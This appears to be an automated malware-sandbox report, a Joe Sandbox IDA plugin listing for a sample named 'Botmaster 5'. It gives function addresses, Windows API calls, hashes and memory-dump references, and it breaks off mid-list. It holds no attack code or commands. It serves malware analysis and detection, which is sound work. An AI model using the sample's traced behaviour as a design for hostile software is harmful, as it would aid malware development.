                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: Mutex$CloseCreateErrorHandleLastRelease
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 733076996-0
                                                                                                                                                                                                                  • Opcode ID: 8aa3218fea7f42e4a239cc0142093b4708dd2e522f657c39c5019defce42112b
                                                                                                                                                                                                                  • Instruction ID: 403ee495fab279d4775e93be771954519e2cb568df44b60383037cbe1f9710fd
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aa3218fea7f42e4a239cc0142093b4708dd2e522f657c39c5019defce42112b
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BF068F12583019BCB50AF70DC82B6BB2A5D7C0304F00443BF244BA1E1E57D8C659A5F
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0040E26B Relevance: 6.0, APIs: 4, Instructions: 32threadCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                    • Part of subcall function 0040E135: EnterCriticalSection.KERNEL32(0046BF18,?,00000000,00000001,0040E279,00000000,00000000,?,?,004060E6,00000000,00000000,00000001,00000000,00000001,00000002), ref: 0040E140
                                                                                                                                                                                                                    • Part of subcall function 0040E135: LeaveCriticalSection.KERNEL32(0046BF18,?,00000000,00000001,0040E279,00000000,00000000,?,?,004060E6,00000000,00000000,00000001,00000000,00000001,00000002), ref: 0040E171
                                                                                                                                                                                                                  • TerminateThread.KERNELBASE(00000000,00000000,00000000,?,?,004060E6,00000000,00000000,00000001,00000000,00000001,00000002,00000001,0000003D,00000001,00000040), ref: 0040E27A
                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(0046BF18,?,?,004060E6,00000000,00000000,00000001,00000000,00000001,00000002,00000001,0000003D,00000001,00000040,00000000,00000035), ref: 0040E286
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000008,?,?,004060E6,00000000,00000000,00000001,00000000,00000001,00000002,00000001,0000003D,00000001,00000040,00000000,00000035), ref: 0040E2A5
                                                                                                                                                                                                                    • Part of subcall function 00428590: HeapFree.KERNEL32(00000000,-00000008,00427F46,-00000010,00000000,004276C2,00000000,?,00000000,IsThemeActive,FFFFFFFF,UxTheme.dll,00000000,00000000,0041CB18,00000008), ref: 004285C9
                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(0046BF18,?,?,004060E6,00000000,00000000,00000001,00000000,00000001,00000002,00000001,0000003D,00000001,00000040,00000000,00000035), ref: 0040E2B9
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 85618057-0
                                                                                                                                                                                                                  • Opcode ID: 784aa8fdaee5fc419792a0b8c4f18810d4cf0ab011c89fae8bed61d5e47e6634
                                                                                                                                                                                                                  • Instruction ID: 99b923dec1313a7ba1b3843724a12c938b1d5e611cf63d1f12f0f5a853006961
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 784aa8fdaee5fc419792a0b8c4f18810d4cf0ab011c89fae8bed61d5e47e6634
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CF0B4311052109BC2045B52EC08D9A37ACDF85721B14487FF100A71A1E7B85C418BAE
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00421FB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00421FDC
                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,Button,?,?,?,?,?,?,00000000,000000FF,00000000,-FFFFFEC7), ref: 00422062
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateWindowmemset
                                                                                                                                                                                                                  • String ID: Button
                                                                                                                                                                                                                  • API String ID: 1730425660-1034594571
                                                                                                                                                                                                                  • Opcode ID: dfc59c343cf9ec092ed69b11a63b7d4f2d84303cedb57e70f056681fc7bcd284
                                                                                                                                                                                                                  • Instruction ID: 8a28ec2162e5006c7e5e364e642a618770ab2d65200c02759b3e6aa17731e294
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfc59c343cf9ec092ed69b11a63b7d4f2d84303cedb57e70f056681fc7bcd284
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4621C171600268BFCF218F44EC85E9B7BB9FB04754F41412AFA0596260D3B99860DF9E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00420267 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00420291
                                                                                                                                                                                                                  • CreateWindowExW.USER32(?,Static,00000000,?,?,?,?,?,00000000,000000FF,00000000,-FFFFFEC7), ref: 0042031D
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateWindowmemset
                                                                                                                                                                                                                  • String ID: Static
                                                                                                                                                                                                                  • API String ID: 1730425660-2272013587
                                                                                                                                                                                                                  • Opcode ID: d2024f4fdded4ad0c72e0da32dee23e2dcb1c3acf65c8cc5525198ddf31bf7c5
                                                                                                                                                                                                                  • Instruction ID: 8e80adcf364d3f1ca59af0efdb8c756169c96a1cd3a6c3bedbb45ca163f8559b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d2024f4fdded4ad0c72e0da32dee23e2dcb1c3acf65c8cc5525198ddf31bf7c5
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9216F71601219AFDB118F45EC09F563FA9FB10365F00422AF8249A2B1D7FD8960DFAE
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00421A54 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00421A7E
                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,Button,?,?,?,?,?,?,00000000,000000FF,00000000), ref: 00421AF9
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateWindowmemset
                                                                                                                                                                                                                  • String ID: Button
                                                                                                                                                                                                                  • API String ID: 1730425660-1034594571
                                                                                                                                                                                                                  • Opcode ID: 133ef5e64cae69b8a7173386d577e859eace017112c77b736b242b54b7a645ce
                                                                                                                                                                                                                  • Instruction ID: 596e23bfc9670839f08e2accfe45bf49b9764abf1e1604e97d4eac04ee0690b0
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 133ef5e64cae69b8a7173386d577e859eace017112c77b736b242b54b7a645ce
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E311B1B1201215AFDB158F55FC86E673BA9FB54314F00813AFA0486260EBB99C689F9D
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004209EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • memset.MSVCRT ref: 00420A16
                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000000,Button,?,?,?,?,?,?,00000000,000000FF,00000000), ref: 00420A7D
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateWindowmemset
                                                                                                                                                                                                                  • String ID: Button
                                                                                                                                                                                                                  • API String ID: 1730425660-1034594571
                                                                                                                                                                                                                  • Opcode ID: 01cc072e606566399e77c69cdc163be8a56ccebd945a50d3389a1ad626d7ed41
                                                                                                                                                                                                                  • Instruction ID: ba64d75bfb0eed09f6f35c3ca7b3fa03a002e309cbae4d5691c0f029bbffb282
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01cc072e606566399e77c69cdc163be8a56ccebd945a50d3389a1ad626d7ed41
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E118471500228BFCB119F95EC45D5B3FF9FB48356B40403AF90492221E7B98C60DF99
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00415390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31fileCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: fopen
                                                                                                                                                                                                                  • String ID: r+b$[C
                                                                                                                                                                                                                  • API String ID: 1432627528-2296212517
                                                                                                                                                                                                                  • Opcode ID: 589b24543e9708554ceea1ec77c61aaa0cdd37b8706385f3e5cc905e6a427f92
                                                                                                                                                                                                                  • Instruction ID: c4a53d9f7f7195e89e4942c8a4b00fc7292f876871920b726ccf3458e50a79fe
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 589b24543e9708554ceea1ec77c61aaa0cdd37b8706385f3e5cc905e6a427f92
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7E09230705918CEDB1C8418A5423FB93279BD47D0F58C02F6D618B348E6BD9CC262DE
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00404B3A Relevance: 4.6, APIs: 3, Instructions: 114comCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00404BA0
                                                                                                                                                                                                                  • CoCreateInstance.OLE32(0043A878,00000000,00000001,0043A888,?,00000000,00000000), ref: 00404BC0
                                                                                                                                                                                                                  • CoUninitialize.OLE32(0043A878,00000000,00000001,0043A888,?,00000000,00000000), ref: 00404C69
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 948891078-0
                                                                                                                                                                                                                  • Opcode ID: b9975eca1a0a9389766f2b8dc209c5d985e1c8f8e8d0f4140af95c09a466cb04
                                                                                                                                                                                                                  • Instruction ID: a3cbfdd2fa9317f314191e8e097899b91daf619f6990a15b7770117914f37678
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9975eca1a0a9389766f2b8dc209c5d985e1c8f8e8d0f4140af95c09a466cb04
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB41D471208305AFC740EF25C886E5EBBE4AF98308F004969F18997271CB35ED59CB56
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 0041B397 Relevance: 4.6, APIs: 3, Instructions: 89filememoryCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0041B671,00000000,009A1000,00000000,?,?,?,00401271,00000000), ref: 0041B415
                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(009A0000,00000000,?,00000000,009A1000,?,?,?,004013C1,00000000,00000001,00000000), ref: 0041B466
                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,009A1000,?,?,?,004013C1,00000000,00000001,00000000), ref: 0041B46F
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ChangeCloseFileFindFreeHeapNotificationWrite
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 3807821158-0
                                                                                                                                                                                                                  • Opcode ID: 657bfaad25981841282f785d25b49419a9d74f9e88e82d1676614b0447ff0064
                                                                                                                                                                                                                  • Instruction ID: 9cf912fe8276dc9f70a1b120a6e93c72a2a10e3ce2508b3a8cea1c763599cf43
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 657bfaad25981841282f785d25b49419a9d74f9e88e82d1676614b0447ff0064
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF2124729087509FC728DFA4D55ADA7BBB8EB45300B04881FF49243622D3B4E880CB9E
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 004154FC Relevance: 4.5, APIs: 3, Instructions: 40filetimeCOMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000,00000000,?,00413315,00000000,?,00000000), ref: 00415532
                                                                                                                                                                                                                    • Part of subcall function 0041793C: SystemTimeToFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004179B3
                                                                                                                                                                                                                    • Part of subcall function 0041793C: LocalFileTimeToFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 004179C1
                                                                                                                                                                                                                  • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,40000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,00000000), ref: 00415565
                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000,?,?,?,?,40000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000), ref: 0041556E
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: FileTime$CloseCreateHandleLocalSystem
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 1775212819-0
                                                                                                                                                                                                                  • Opcode ID: 6ea3663da39ba42c3e37d4a03a8b66805f4ba3411a6c06766d5e260932c5fa27
                                                                                                                                                                                                                  • Instruction ID: d4ff4b9c0073df0512306744fb28a537e71491fc883c16058bbab95411fcc974
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ea3663da39ba42c3e37d4a03a8b66805f4ba3411a6c06766d5e260932c5fa27
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19F04F71248300BFE210EA20CC42F6BB6EDEB84708F108919F684960E2D775AD58975A
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00420B47 Relevance: 4.5, APIs: 3, Instructions: 40COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00420B74
                                                                                                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00420B93
                                                                                                                                                                                                                  • wcslen.MSVCRT ref: 00420B9A
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274800334.0000000000466000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274822673.0000000000469000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274846823.000000000046D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Botmaster 5.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: TextWindow$Lengthwcslen
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 4230322251-0
                                                                                                                                                                                                                  • Opcode ID: 916c9465c9723718f3e6e20e708f513ea5f5fc79850ba53868875e158b71c016
                                                                                                                                                                                                                  • Instruction ID: e240c25baf5dd20862e55b68f77e5754eb3d73a3791f55b90f9f0f7665f1cd84
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 916c9465c9723718f3e6e20e708f513ea5f5fc79850ba53868875e158b71c016
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38F0C836204111BE97115B64EC44CAB7BE9FF88354B404026F40082125DB39DC10D769
                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                  Function 00415430 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000008.00000002.2274619904.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274601383.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274691658.0000000000433000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274744056.0000000000439000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000008.00000002.2274777336.0000000000465000.00000004.00000001.01000000.00000007.sdmpDownload File
